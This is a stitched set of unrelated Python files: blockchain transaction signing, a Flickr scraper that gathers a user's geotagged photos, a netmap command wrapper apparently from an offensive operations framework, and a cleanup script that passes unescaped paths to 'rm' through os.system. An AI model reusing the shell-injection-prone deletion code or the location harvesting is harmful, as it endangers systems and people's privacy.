# LICENSE file in the root directory of this source tree.
# pyre-strict
from dataclasses import dataclass
from enum import Enum
from typing import Any, Dict, List, Mapping, Optional
from dataclasses_json import dataclass_json
from fbpcs.entity.container_instance import ContainerInstance
from fbpcs.entity.instance_base import InstanceBase
class MPCRole(Enum):
SERVER = "SERVER"
CLIENT = "CLIENT"
class MPCInstanceStatus(Enum):
UNKNOWN = "UNKNOWN"
CREATED = "CREATED"
STARTED = "STARTED"
COMPLETED = "COMPLETED"
FAILED = "FAILED"
CANCELED = "CANCELED"
@dataclass_json
@dataclass
class MPCInstance(InstanceBase):
instance_id: str
game_name: str
mpc_role: MPCRole
num_workers: int
server_ips: Optional[List[str]]
containers: List[ContainerInstance]
status: MPCInstanceStatus
game_args: Optional[List[Dict[str, Any]]]
arguments: Mapping[str, Any]
def __init__(
self,
instance_id: str,
game_name: str,
mpc_role: MPCRole,
num_workers: int,
ip_config_file: Optional[str] = None,
server_ips: Optional[List[str]] = None,
containers: Optional[List[ContainerInstance]] = None,
status: MPCInstanceStatus = MPCInstanceStatus.UNKNOWN,
game_args: Optional[List[Dict[str, Any]]] = None,
**arguments # pyre-ignore
) -> None:
self.instance_id = instance_id
self.game_name = game_name
self.mpc_role = mpc_role
self.num_workers = num_workers
self.ip_config_file = ip_config_file
self.server_ips = server_ips
self.containers = containers or []
self.status = status
self.game_args = game_args
self.arguments = arguments
def get_instance_id(self) -> str:
return self.instance_id
def __str__(self) -> str:
# pyre-ignore
return self.to_json()
|
def knapsack(max_weight, weights, values, n):
cache = [[0 for _ in range(max_weight+1)] for _ in range(n+1)]
# i iterates over values
for i in range(n + 1):
# j iterates over different max weight values
for j in range(max_weight + 1):
if i == 0 or j == 0:
cache[i][j] = 0
elif j >= weights[i-1]:
cache[i][j] = max(cache[i-1][j - weights[i - 1]] + values[i - 1], cache[i - 1][j])
else:
cache[i][j] = cache[i-1][j]
return cache[i][j]
if __name__ == '__main__':
val = [50, 100, 150, 200]
wt = [8, 16, 32, 40]
W = 64
n = len(val)
print(knapsack(W, wt, val, n))
|
# -*- coding: utf-8 -*-
import base64
import hashlib
import sys
import binascii
import ed25519
sys.path.insert(0, 'python-sha3')
from python_sha3 import *
from .helper import *
from config import config
import datetime
import struct
import binascii
import requests
import json
import time
def getTimeStamp(delta=0):
return int(time.time()) - 1427587585 + delta
def post(nis,url,data):
headers = {'Content-type': 'application/json'}
return requests.post(nis+url, data=json.dumps(data), headers=headers, timeout=10)
def int2hex(i: int):
return binascii.hexlify(struct.pack('<I', i)).decode('utf-8')
def long2hex(i: int):
return binascii.hexlify(struct.pack('<q', i)).decode('utf-8')
def string2hex(string: str):
return binascii.hexlify(string.encode('utf-8')).decode('utf-8')
def pvtkey2pubkey(pvtkey :str):
binpvtkey = binascii.unhexlify(pvtkey)[::-1]
binpubkey = ed25519.publickey_hash_unsafe(binpvtkey , sha3_512)
return binascii.hexlify(binpubkey).decode('utf-8')
def pubkey2addr(pubkey :str, version="main"):
pubkey = binascii.unhexlify(pubkey)
s = sha3_256()
s.update(pubkey)
sha3_pubkey = s.digest()
h = hashlib.new('ripemd160')
h.update(sha3_pubkey)
ripe = h.digest()
if version == 'main':
versionHex = "68" + ripe.hex()
elif version == 'test':
versionHex = "98" + ripe.hex()
elif version == 'mijin':
versionHex = "60" + ripe.hex()
versionHex = binascii.unhexlify(versionHex)
s2 = sha3_256()
s2.update(versionHex)
checksum = s2.digest()[0:4]
address = base64.b32encode(versionHex + checksum)
return address.decode('utf-8')
def announceTransaction(data, nis):
return post(nis, '/transaction/announce', data)
def signTransaction(hexString, pvtkey):
binpvtkey = binascii.unhexlify(pvtkey)[::-1]
binpubkey = binascii.unhexlify(pvtkey2pubkey(pvtkey))
signature = ed25519.signature_hash_unsafe(binascii.unhexlify(hexString), binpvtkey, binpubkey, sha3_512)
signed_data = {"data": hexString, "signature": signature.hex()}
return signed_data
# https://nemproject.github.io
def createTransaction(t):
feeHex = long2hex(t["fee"])
timestampHex = int2hex(t["timeStamp"])
deadlineHex = int2hex(t["deadline"])
transactionTypeHex = int2hex(t["type"])
version = t["version"] + (t["type"]==TransactionType.transfer_transaction or t["type"]==TransactionType.multisig_aggregate_modification_transfer_transaction)
versionHex = int2hex(version)
pubkeyLengthHex = int2hex(len(t["signer"])//2)
hexString = transactionTypeHex + versionHex + timestampHex + pubkeyLengthHex + t["signer"] + feeHex + deadlineHex
if t["type"] == TransactionType.transfer_transaction:
hexString += createTransferPart(t["recipient"], t["amount"], t["message"], t["mosaics"])
elif t["type"] == TransactionType.importance_transfer_transaction:
hexString += createImportanceTransferPart(t["mode"],t["remoteAccount"])
elif t["type"] == TransactionType.multisig_aggregate_modification_transfer_transaction:
hexString += createMultisigAggregateModificationTransferPart(t["modifications"], t["minCosignatories"])
elif t["type"] == TransactionType.multisig_signature_transaction:
hexString += createMultisigSignaturePart(t["otherHash"], t["otherAccount"])
elif t["type"] == TransactionType.multisig_transaction:
hexString += createMultisigPart(t["inner"])
elif t["type"] == TransactionType.provision_namespace_transaction:
hexString += createProvisionNamespaceTransactionPart(RentalFeeSink(versionHex), t["newPart"], t["parent"])
elif t["type"] == TransactionType.mosaic_definition_creation_transaction:
hexString += createMosaicDefinitionCreationTransactionPart(CreationFeeSink(versionHex), t["mosaicDefinition"])
elif t["type"] == TransactionType.mosaic_supply_change_transaction:
hexString += createMosaicSupplyChangeTransactionPart(t["supplyType"], t["delta"], t["mosaicId"])
else:
raise
return hexString
def createTransferPart(recipientAddressString, amount, message, mosaics):
recipientAddressHex = string2hex(recipientAddressString)
recipientAddressLengthHex = int2hex(len(recipientAddressHex)//2)
amountHex = long2hex(amount)
messageTypeHex = int2hex(message["type"])
payloadHex = string2hex(message["payload"])
hexString = recipientAddressLengthHex + recipientAddressHex + amountHex
if len(payloadHex) > 0:
# TODO ENCRYPTION
payloadLengthHex = int2hex(len(payloadHex)//2)
messageFieldLengthHex = int2hex(len(messageTypeHex + payloadLengthHex + payloadHex)//2)
hexString += messageFieldLengthHex + messageTypeHex + payloadLengthHex + payloadHex
else:
messageFieldLengthHex = int2hex(0)
hexString += messageFieldLengthHex
mosaicsNumberHex = int2hex(len(mosaics))
hexString += mosaicsNumberHex
for mosaic in mosaics:
quantityHex = long2hex(mosaic["quantity"])
namespaceIdStringHex = string2hex(mosaic["mosaicId"]["namespaceId"])
mosaicNameStringHex = string2hex(mosaic["mosaicId"]["name"])
namespaceIdStringLength = len(namespaceIdStringHex)//2
mosaicNameStringLength = len(mosaicNameStringHex)//2
namespaceIdStringLengthHex = int2hex(namespaceIdStringLength)
mosaicNameStringLengthHex = int2hex(mosaicNameStringLength)
mosaicIdStructureLength = 4+namespaceIdStringLength+4+mosaicNameStringLength
mosaicIdStructureLengthHex = int2hex(mosaicIdStructureLength)
mosaicStructureLengthHex = int2hex(4+mosaicIdStructureLength+8)
mosaicHex = mosaicStructureLengthHex + mosaicIdStructureLengthHex
mosaicHex += namespaceIdStringLengthHex + namespaceIdStringHex
mosaicHex += mosaicNameStringLengthHex + mosaicNameStringHex
mosaicHex += quantityHex
hexString += mosaicHex
return hexString
def createImportanceTransferPart(mode, remoteAccount):
hexString = int2hex(mode) + int2hex(0x20)
hexString += remoteAccount
return hexString
def createMultisigAggregateModificationTransferPart(modifications, minCosignatories):
hexString = int2hex(len(modifications))
for m in modifications:
hexString += int2hex(0x28) + int2hex(m["modificationType"]) + int2hex(0x20) + m["cosignatoryAccount"]
hexString += int2hex(0x04) + int2hex(minCosignatories["relativeChange"])
return hexString
def createMultisigSignaturePart(otherHash, otherAccount):
hexString = int2hex(0x24) + int2hex(0x20) + otherHash["data"] + int2hex(0x28) + string2hex(otherAccount)
return hexString
def createProvisionNamespaceTransactionPart(rentalFeeSink, newPart, parent):
if parent:
rentalFee = RentalFee.sub
else:
rentalFee = RentalFee.root
hexString = int2hex(0x28) + string2hex(rentalFeeSink) + long2hex(rentalFee)
newPartString = string2hex(newPart)
hexString += int2hex(len(newPartString)//2) + newPartString
if parent:
parentString = string2hex(parent)
hexString += int2hex(len(parentString)//2) + parentString
else:
hexString += int2hex(0xffffffff)
return hexString
def createMosaicDefinitionCreationTransactionPart(creationFeeSink, mosaicDefinition):
if len(mosaicDefinition["creator"]) != 64:
raise
hexString = int2hex(0x20) + mosaicDefinition["creator"]
# start mosaicDefinition
namespaceIdStringHex = string2hex(mosaicDefinition["id"]["namespaceId"])
mosaicNameStringHex = string2hex(mosaicDefinition["id"]["name"])
mosaicIdStructureHex = int2hex(len(namespaceIdStringHex)//2) + namespaceIdStringHex + int2hex(len(mosaicNameStringHex)//2) + mosaicNameStringHex
hexString += int2hex(len(mosaicIdStructureHex)//2) + mosaicIdStructureHex
descriptionStringHex = string2hex(mosaicDefinition["description"])
hexString += int2hex(len(descriptionStringHex)//2) + descriptionStringHex
hexString += int2hex(len(mosaicDefinition["properties"]))
for prop in mosaicDefinition["properties"]:
propNameHex = string2hex(prop["name"])
propValueHex = string2hex(prop["value"])
propStructureHex = int2hex(len(propNameHex)//2) + propNameHex + int2hex(len(propValueHex)//2) + propValueHex
hexString += int2hex(len(propStructureHex)//2) + propStructureHex
if "levy" in mosaicDefinition:
hexString += int2hex(0) # TODO LEVY
else:
hexString += int2hex(0)
# end mosaicDefinition
hexString = int2hex(len(hexString)//2) + hexString
hexString += int2hex(0x28) + string2hex(creationFeeSink)
hexString += long2hex(CreationFee.mosaic)
print(hexString)
return hexString
def createMosaicSupplyChangeTransactionPart(supplyType, delta, mosaicId):
namespaceIdStringHex = string2hex(mosaicId["namespaceId"])
mosaicNameStringHex = string2hex(mosaicId["name"])
mosaicIdStructureHex = int2hex(len(namespaceIdStringHex)//2) + namespaceIdStringHex + int2hex(len(mosaicNameStringHex)//2) + mosaicNameStringHex
hexString = int2hex(len(mosaicIdStructureHex)//2) + mosaicIdStructureHex
hexString += int2hex(supplyType)
hexString += long2hex(delta)
return hexString
def createMultisigPart(inner):
innerHex = createTransaction(inner)
return int2hex(len(innerHex)//2) + innerHex
|
import os, sys
# import threading
# t_data = threading.local()
capture_stack = None
capture_manager = None
def configure():
_capture_stack = []
_capture_stack.append((sys.__stdout__, sys.__stderr__))
thismodule = sys.modules[__name__]
setattr(thismodule, 'capture_stack', _capture_stack)
_capture_manager = StdCapture()
setattr(thismodule, 'capture_manager', _capture_manager)
# t_data.capture_stack = _capture_stack
def desconfigure():
thismodule = sys.modules[__name__]
_capture_stack = []
_capture_stack.append((sys.__stdout__, sys.__stderr__))
thismodule = sys.modules[__name__]
setattr(thismodule, 'capture_stack', _capture_stack)
_capture_manager = StdCapture()
setattr(thismodule, 'capture_manager', _capture_manager)
# t_data.capture_stack = _capture_stack
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
def get_capture():
thismodule = sys.modules[__name__]
return thismodule.capture_manager
def get_capture_mng(out=None, err=None):
c = get_capture()
c.curr_out = out
c.curr_err = err
return c
def start_capture(out=None, err=None):
c = get_capture()
c.curr_out = out
c.curr_err = err
c._start_capture()
return c
def stop_capture():
c = get_capture()
c._end_capture()
return c
class DummyFile(object):
def write(self, x): pass
class StdCapture:
def __init__(self):
self.curr_out = None
self.curr_err = None
def _start_capture(self):
if self.curr_out is None:
self.curr_out = DummyFile()
if self.curr_err is None:
self.curr_err = DummyFile()
thismodule = sys.modules[__name__]
thismodule.capture_stack.append((self.curr_out, self.curr_err))
sys.stdout = self.curr_out;
sys.stderr = self.curr_err;
return self
def _end_capture(self):
thismodule = sys.modules[__name__]
thismodule.capture_stack.pop()
(out, err) = thismodule.capture_stack[-1]
self.curr_out = out
self.curr_err = err
sys.stdout = out
sys.stderr = err
return self
def __enter__(self, *args, **kwargs):
self._start_capture()
def __exit__(self, exc_type, exc_val, exc_tb, *args, **kwargs):
self._end_capture()
|
from .Postgres import PostgresDataHandler
|
"""Tools for working with design spaces."""
from typing import Any, List, Mapping, Type
from uuid import UUID
from citrine._rest.resource import Resource
from citrine._serialization import properties
from citrine._serialization.polymorphic_serializable import PolymorphicSerializable
from citrine._serialization.serializable import Serializable
from citrine._session import Session
from citrine.informatics.descriptors import Descriptor
from citrine.informatics.dimensions import Dimension
from citrine.informatics.modules import Module
__all__ = ['DesignSpace', 'ProductDesignSpace', 'EnumeratedDesignSpace']
class DesignSpace(Module):
"""A Citrine Design Space - an abstract type that returns the proper
subtype based on the 'type' value of the passed in dict.
"""
_response_key = None
@classmethod
def get_type(cls, data) -> Type[Serializable]:
"""Return the subtype."""
return {
'Univariate': ProductDesignSpace,
'EnumeratedDesignSpace': EnumeratedDesignSpace,
}[data['config']['type']]
class ProductDesignSpace(Resource['ProductDesignSpace'], DesignSpace):
"""Design space composed of an outer product of univariate dimensions, either continuous or enumerated.
Parameters
----------
name:str
the name of the design space
description:str
the description of the design space
dimensions: list[Dimension]
univariate dimensions that are factors of the design space; can be enumerated or continuous
"""
_response_key = None
uid = properties.Optional(properties.UUID, 'id', serializable=False)
name = properties.String('config.name')
description = properties.Optional(properties.String(), 'config.description')
dimensions = properties.List(properties.Object(Dimension), 'config.dimensions')
typ = properties.String('config.type', default='Univariate', deserializable=False)
status = properties.String('status', serializable=False)
status_info = properties.Optional(
properties.List(properties.String()),
'status_info',
serializable=False
)
active = properties.Boolean('active', default=True)
# NOTE: These could go here or in _post_dump - it's unclear which is better right now
module_type = properties.String('module_type', default='DESIGN_SPACE')
schema_id = properties.UUID('schema_id', default=UUID('6c16d694-d015-42a7-b462-8ef299473c9a'))
def __init__(self,
name: str,
description: str,
dimensions: List[Dimension],
session: Session = Session()):
self.name: str = name
self.description: str = description
self.dimensions: List[Dimension] = dimensions
self.session: Session = session
def _post_dump(self, data: dict) -> dict:
data['display_name'] = data['config']['name']
return data
def __str__(self):
return '<ProductDesignSpace {!r}>'.format(self.name)
class EnumeratedDesignSpace(Resource['EnumeratedDesignSpace'], DesignSpace):
"""Design space composed of an explicit enumeration of candidate materials to score. Note that every candidate must have exactly the descriptors in the list populated (no more, no less) to be included.
Parameters
----------
name:str
the name of the design space
description:str
the description of the design space
descriptors: list[Descriptor]
the list of descriptors included in the candidates of the design space
data: list[dict]
list of dicts of the shape `{<descriptor_key>: <descriptor_value>}` where each dict corresponds to a candidate
in the design space
"""
_response_key = None
uid = properties.Optional(properties.UUID, 'id', serializable=False)
name = properties.String('config.name')
description = properties.Optional(properties.String(), 'config.description')
descriptors = properties.List(properties.Object(Descriptor), 'config.descriptors')
data = properties.List(properties.Mapping(properties.String, properties.Raw), 'config.data')
typ = properties.String('config.type', default='EnumeratedDesignSpace', deserializable=False)
status = properties.String('status', serializable=False)
status_info = properties.Optional(
properties.List(properties.String()),
'status_info',
serializable=False
)
active = properties.Boolean('active', default=True)
# NOTE: These could go here or in _post_dump - it's unclear which is better right now
module_type = properties.String('module_type', default='DESIGN_SPACE')
schema_id = properties.UUID('schema_id', default=UUID('f3907a58-aa46-462c-8837-a5aa9605e79e'))
def __init__(self,
name: str,
description: str,
descriptors: List[Descriptor],
data: List[Mapping[str, Any]],
session: Session = Session()):
self.name: str = name
self.description: str = description
self.descriptors: List[Descriptor] = descriptors
self.data: List[Mapping[str, Any]] = data
self.session: Session = session
def _post_dump(self, data: dict) -> dict:
data['display_name'] = data['config']['name']
return data
def __str__(self):
return '<EnumeratedDesignSpace {!r}>'.format(self.name)
|
import flickr_api
from multiprocessing.pool import ThreadPool
import flickr_api.flickrerrors
import threading
import sys
import logging
class Photo:
_GPS_TAGS = ['gpslatitude','gps','gps latitude','gps position','gps altitude', 'latitude', 'position']
def __init__(self, photo):
self.data = photo
# sends request to flickr api
self.exif = {}
def setExif(self, exif_data):
self.exif = exif_data
def hasGpsData(self):
for x in self.exif.keys():
if x.lower() in Photo._GPS_TAGS:
return True
return False
def downloadExifData(self):
photo = self.data
try:
logging.info('Retrieving EXIF data of {}'.format(photo.id))
self.exif = self._exifToDict(photo.getExif())
except flickr_api.flickrerrors.FlickrAPIError as e:
logging.error('Failed to retrieve EXIF data of photo {}, | Error: {}'.format(photo.id, e))
except:
logging.error('Failed to retrieve EXIF data of photo {}, | Error: {}'.format(photo.id, sys.exc_info()[0]))
return self.exif
def _exifToDict(self, exif):
return {
x.tag : x.raw
for x in exif
}
class FlickrUserExplorer:
# url: url to user's profile
def __init__(self, url, threads = 4):
logging.info('Loading user: {}'.format(url))
self.user = flickr_api.Person.findByUrl(url)
logging.info('User loaded')
self.discovered_photos = []
self.filtered_photos= []
self.filtered_photos_lock = threading.RLock()
self.MAX_THREADS = threads
# a target function for threads spawned by findPhotos method
def _retrievePhotosFromPage(self, page_number):
photos = self.user.getPhotos(page= page_number)
logging.info('Explored page {}, {} photos found'.format(page_number, len(photos)))
return photos
def _retrievePhotoExif(self, photo):
# convert the object returned by flickr_api into a Photo object
photo = Photo(photo)
photo.downloadExifData()
if photo.hasGpsData():
with self.filtered_photos_lock:
self.filtered_photos.append(photo)
else:
logging.info('Filtering out photo {} for not having GPS data'.format(photo.data.id))
# Find all photos in the user's page
# if end_page is not provided, all pages will be explored, starting from start_page
def findPhotos(self, start_page, end_page):
if start_page > end_page:
raise ValueError('Invalid page numbers')
# Used to detect if the last page has already been reached
all_photos = []
pages = range(start_page, end_page+1)
thread_pool = ThreadPool(processes= self.MAX_THREADS)
results = thread_pool.map(self._retrievePhotosFromPage, pages)
thread_pool.close()
thread_pool.join()
for x in results:
all_photos.extend(x)
logging.info('Total {} photos found'.format(len(all_photos)))
return all_photos
# Find all photos in the user's page
# if end_page is not provided, all pages will be explored, starting from start_page
def findPhotosWithGeoTag(self, start_page, end_page):
photos = self.findPhotos(start_page, end_page)
# photos = photos[:20] # todo remove, added only for debugging
logging.info('Retrieving exif data of found photos')
thread_pool = ThreadPool(processes= self.MAX_THREADS)
# maps all photo objects to Photo objects, with exif data
thread_pool.map_async(self._retrievePhotoExif, photos)
thread_pool.close()
thread_pool.join()
logging.info('-----Photos with GPS data found: {}-----'.format(len(self.filtered_photos)))
return self.filtered_photos
|
import ops.cmd
import ops
import ops.env
import ops.cmd.safetychecks
from ops.cmd import getBoolOption, setBoolOption, getValueOption, setListOption
OpsCommandException = ops.cmd.OpsCommandException
VALID_OPTIONS = ['minimal', 'type']
class NetmapCommand(ops.cmd.DszCommand, ):
optgroups = {}
reqgroups = []
reqopts = []
defopts = {}
def __init__(self, plugin='netmap', netmap_type=None, **optdict):
ops.cmd.DszCommand.__init__(self, plugin, **optdict)
self.netmap_type = netmap_type
def validateInput(self):
for opt in self.optdict:
if (opt not in VALID_OPTIONS):
return False
return True
minimal = property((lambda x: getBoolOption(x, 'minimal')), (lambda x, y: setBoolOption(x, y, 'minimal')))
netmap_type = property((lambda x: getValueOption(x, 'type')), (lambda x, y: setListOption(x, y, 'type', ['all', 'connected', 'remembered'])))
def mySafetyCheck(self):
good = True
msgparts = []
if (ops.env.get('OPS_NONETMAP').upper() == 'TRUE'):
good = False
msgparts.append('OPS_NONETMAP is set to TRUE, you should probably not run a netmap')
if (not self.validateInput()):
good = False
msgparts.append('Your command did not pass input validation')
msg = ''
if (len(msgparts) > 0):
msg = msgparts[0]
for msgpart in msgparts[1:]:
msg += ('\n\t' + msgpart)
return (good, msg)
ops.cmd.command_classes['netmap'] = NetmapCommand
ops.cmd.aliasoptions['netmap'] = VALID_OPTIONS
ops.cmd.safetychecks.addSafetyHandler('netmap', 'ops.cmd.netmap.mySafetyCheck')
|
#!/usr/bin/env python2
""" The layout class """
# upconvert.py - A universal hardware design file format converter using
# Format: upverter.com/resources/open-json-format/
# Development: github.com/upverter/schematic-file-converter
#
# Copyright 2011 Upverter, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from upconvert.core.shape import Arc
class Layout:
""" Represents the design schematic as a PCB Layout. """
def __init__(self):
self.layers = list()
def generate_netlist(self):
""" Generate a netlist from the layout. """
pass
def json(self):
""" Return the layout as JSON """
return {
"layers": [layer.json() for layer in self.layers]
}
class Layer:
""" A layer in the layout (ie, a PCB layer). """
def __init__(self, name='', type_=''):
self.name = name
self.type = type_ # copper/mask/silk/drill
self.images = list()
self.apertures = dict()
self.macros = dict()
self.vias = list()
self.components = list()
def json(self):
""" Return the layer as JSON """
return {
"type": self.type,
"images": [i.json() for i in self.images],
"apertures": [self.apertures[k].json() for k in self.apertures],
"macros": [self.macros[m].json() for m in self.macros],
"vias": [v.json() for v in self.vias],
"components": [c.json() for c in self.components]
}
class Image:
"""
An image layer (not a PCB layer).
Image layers can be additive or subtractive. Therefore they
must be applied successively to build up a final image
representing a single layer of the PCB (ie, a single gerber
file).
Image layers will be applied in the order they appear in the
layer[n].images list of the Layout. Subtractive image layers
only subtract from previous image layers - not subsequent
image layers.
Example
=======
For a ground plane that is partly negated to make room for
traces, define three image layers in the following order:
1. the ground plane
2. the area(s) to be negated (as a subtractive image)
3. the traces to be laid within the negated area(s)
"""
def __init__(self, name='Untitled Image', is_additive=True):
self.name = name
self.is_additive = is_additive
self.x_repeats = 1
self.x_step = None
self.y_repeats = 1
self.y_step = None
self.traces = list()
self.fills = list()
self.smears = list()
self.shape_instances = list()
def not_empty(self):
""" True if image contains only metadata. """
return (self.traces or self.fills or self.smears or
self.shape_instances) and True or False
def get_trace(self, width, end_pts):
"""
Get a trace given a width and pair of points.
Return None if no Trace is found.
Params:
width - float
end_pts - tuple of 2 Points (ie, the endpoints of
the segment we wish to attach)
"""
start, end = end_pts
for trace in self.traces:
for seg in trace.segments:
if trace.width == width:
if isinstance(seg, Arc):
seg_ends = seg.ends()
else:
seg_ends = (seg.p1, seg.p2)
if start in seg_ends or end in seg_ends:
return trace
return None
def json(self):
""" Return the image as JSON """
return {
"name": self.name,
"is_additive": self.is_additive and 'true' or 'false',
"x_repeats": self.x_repeats,
"x_step": self.x_step,
"y_repeats": self.y_repeats,
"y_step": self.y_step,
"traces": [t.json() for t in self.traces],
"fills": [f.json() for f in self.fills],
"smears": [s.json() for s in self.smears],
"shape_instances": [i.json() for i in self.shape_instances]
}
class Trace:
""" A collection of connected segments (lines/arcs). """
def __init__(self, width, segments=None):
self.width = width
self.segments = segments or []
def json(self):
""" Return the trace as JSON """
return {
"width": self.width,
"segments": [s.json() for s in self.segments]
}
class Fill:
"""
A closed loop of connected segments (lines/arcs).
The segments define the outline of the fill. They
must be contiguous, listed in order (ie, each seg
connects with the previous seg and the next seg)
and not intersect each other.
"""
def __init__(self, segments=None):
self.segments = segments or list()
def json(self):
""" Return the trace as JSON """
return {
"segments": [s.json() for s in self.segments]
}
class Smear:
""" A line drawn by a rectangular aperture. """
def __init__(self, line, shape):
self.line = line
self.shape = shape
def json(self):
""" Return the smear as JSON """
return {
"line": self.line.json(),
"shape": self.shape.json()
}
class ShapeInstance:
"""
An instance of a shape defined by an aperture.
Instead of wrapping the aperture itself, we wrap
its constituent shape and hole defs, because
gerber does not prohibit an aperture from being
redefined at some arbitrary point in the file.
x and y attributes serve as an offset.
"""
def __init__(self, point, aperture):
self.x = point.x
self.y = point.y
self.shape = aperture.shape
self.hole = aperture.hole
def json(self):
""" Return the shape instance as JSON """
return {
"x": self.x,
"y": self.y,
"shape": (isinstance(self.shape, str) and
self.shape or self.shape.json()),
"hole": self.hole and self.hole.json()
}
class Aperture:
"""
A simple shape, with or without a hole.
If the shape is not defined by a macro, its class
must be one of Circle, Rectangle, Obround or
RegularPolygon.
If the shape is not defined by a macro, it may have
a hole. The class of the hole must be either Circle
or Rectangle. Shape and hole are both centered on
the origin. Placement is handled by metadata
connected to the aperture when it used.
Holes must be fully contained within the shape.
Holes never rotate, even if the shape is rotatable
(ie, a RegularPolygon).
"""
def __init__(self, code, shape, hole):
self.code = code
self.shape = shape
self.hole = hole
def __eq__(self, other):
""" Compare 2 apertures. """
if (isinstance(self.shape, str) or
isinstance(other.shape, str)):
equal = self.shape == other.shape
else:
equal = (self.shape.__dict__ == other.shape.__dict__ and
(self.hole == other.hole or
(self.hole and other.hole and
self.hole.__dict__ == other.hole.__dict__)))
return equal
def json(self):
""" Return the aperture as JSON """
return {
"code": self.code,
"shape": (isinstance(self.shape, str) and
self.shape or self.shape.json()),
"hole": self.hole and self.hole.json()
}
class Macro:
"""
Complex shape built from multiple primitives.
Primitive shapes are added together in the order they
appear in the list. Subtractive shapes subtract only
from prior shapes, not subsequent shapes.
"""
def __init__(self, name, primitives):
self.name = name
self.primitives = primitives
def json(self):
""" Return the macro as JSON """
return {
"name": self.name,
"primitives": [prim.json() for prim in self.primitives]
}
class Primitive:
""" A shape with rotation and exposure modifiers. """
def __init__(self, is_additive, rotation, shape):
self.is_additive = is_additive
self.rotation = rotation
self.shape = shape
def json(self):
""" Return the primitive as JSON """
return {
"is_additive": self.is_additive and 'true' or 'false',
"rotation": self.rotation,
"shape": self.shape.json()
}
|
"""
This software is distributed under MIT/X11 license
Copyright (c) 2021 Mauro Marini - University of Cagliari
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from django.test import TestCase, Client
from api.document.models import DocumentVersion
from api.document.test.abstract_document_test import DocumentTestAbstract
class FrontendTestAcceptance(DocumentTestAbstract, TestCase):
"""
Acceptance test class for frontend
"""
def setUp(self):
"""
Setup method
:return:
"""
self.documents_versions += [DocumentVersion.objects.create(
author=self.pa_operators[0],
document=self.documents[1],
) for _ in range(self.RANGE_MAX_DOCUMENT_VERSIONS)]
self.client = Client()
def test_check_created_data(self):
"""
Check the data created by setUpTestData
:return:
"""
self.assertEqual(len(self.public_authorities), self.RANGE_MAX)
self.assertEqual(len(self.pa_operators), self.RANGE_MAX)
self.assertEqual(len(self.citizens), self.RANGE_MAX)
self.assertEqual(len(self.documents), self.RANGE_MAX_DOCUMENTS)
self.assertEqual(len(self.documents_versions), self.RANGE_MAX_DOCUMENT_VERSIONS * 2)
self.assertEqual(len(self.permissions), self.RANGE_MAX_DOCUMENTS - 1)
self.assertEqual(len(self.favorites), self.RANGE_MAX_DOCUMENTS - 1)
# ------------------------------------------------------------------------------------------------------------------
#
# Document
#
# ------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------
# document list
# ------------------------------------------------------------------------------------------------------------------
def test_document_list(self):
"""
Test the document list page not authenticated
:return:
"""
response = self.client.get('/', follow=True)
self.assertEqual(response.status_code, 200)
self.assertLess(len(response.context['documents']), self.RANGE_MAX_DOCUMENTS) # only public documents are shown
# ------------------------------------------------------------------------------------------------------------------
# document detail
# ------------------------------------------------------------------------------------------------------------------
def test_document_detail(self):
"""
Test the document detail page not authenticated
:return:
"""
response = self.client.get('/2', follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['versions']), self.RANGE_MAX_DOCUMENT_VERSIONS)
def test_document_detail_private_not_viewable_document(self):
"""
Test the document detail page not authenticated
:return:
"""
response = self.client.get('/1', follow=True)
self.assertEqual(response.status_code, 404)
# ------------------------------------------------------------------------------------------------------------------
# document version detail
# ------------------------------------------------------------------------------------------------------------------
def test_document_version_detail(self):
"""
Test the document detail page not authenticated
:return:
"""
response = self.client.get('/version/11', follow=True)
self.assertEqual(response.status_code, 200)
def test_document_version_detail_fail_document_private(self):
"""
Test the document detail page not authenticated
:return:
"""
response = self.client.get('/version/8', follow=True)
self.assertEqual(response.status_code, 404) # associate to document 1 (private)
|
import argparse
import os
standard_path = 'no_dos'
parser = argparse.ArgumentParser(description='Cleans experiments folder.')
parser.add_argument('-e', default=standard_path, help='Path to experiments folder')
args = parser.parse_args()
# Iterate though experiment folders.
root = args.e
for top, dirs, files in os.walk(root):
if dirs == ['figures'] or dirs == []:
os.system('rm ' + top + '/interrupt_trace.csv > /dev/null')
os.system('rm ' + top + '/interrupt_trace.stats.csv > /dev/null')
os.system('rm ' + top + '/sequence.csv > /dev/null')
os.system('rm ' + top + '/trace.h > /dev/null')
os.system('rm ' + top + '/rx_times.csv > /dev/null')
os.system('rm -r ' + top + '/figures > /dev/null')
# os.system('rm ' + top + '/packet_trace.csv > /dev/null')
|
from draco.core.containers import GainData
from caput import mpiarray, mpiutil
import pytest
import glob
import numpy as np
import os
# Run these tests under MPI
pytestmark = pytest.mark.mpi
comm = mpiutil.world
rank, size = mpiutil.rank, mpiutil.size
len_axis = 8
dset1 = np.arange(len_axis * len_axis * len_axis)
dset1 = dset1.reshape((len_axis, len_axis, len_axis))
dset2 = np.arange(len_axis * len_axis)
dset2 = dset2.reshape((len_axis, len_axis))
freqs = np.arange(len_axis)
inputs = np.arange(len_axis)
times = np.arange(len_axis)
fsel = slice(5)
isel = slice(1, 4)
tsel = slice(1, 4)
@pytest.fixture
